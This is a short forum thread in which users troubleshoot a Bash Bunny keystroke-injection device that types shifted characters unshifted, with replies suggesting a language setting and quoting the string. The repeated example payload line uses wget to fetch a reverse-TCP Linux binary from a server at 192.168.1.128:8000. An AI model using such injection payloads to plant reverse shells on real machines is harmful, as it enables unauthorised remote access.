FredW Posted December 3, 2020 Share Posted December 3, 2020 It seems like my bash bunny occasionally mistype... _ becomes - : becomes ; uppercase becomes lowercase All of these have a thing in common, which is a shift character being typed as if not shifted. Ex1. Q STRING wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf becomes wget -O reverse_tcp_linux.elf 192.168.1.128;8000/reverse_tcp_linux.elf Ex2. Q STRING wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf becomes wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse-tcp_linux.elf Ex3. Q STRING wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf becomes wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp-linux.elf These 3 examples are what had happened to me before, but I doubt this could happen anywhere with a shifted character. Anyone know what is the issue here? any work around? Thank you! Quote Link to post Share on other sites
chrizree Posted December 3, 2020 Share Posted December 3, 2020 Are you specifying DUCKY_LANG in your payloads? Not that I think it would make any real difference, but better to try than not Quote Link to post Share on other sites
DangerAnt Posted January 13 Share Posted January 13 I have also run into this problem. i was able to get around it and completely resolve the problem with the use of Quotes ("). In other words when using QUACK STRING put your command in Quotes for your first example try putting Q STRING "wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf" in your payload instead of Q STRING wget -O reverse_tcp_linux.elf 192.168.1.128:8000/reverse_tcp_linux.elf Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.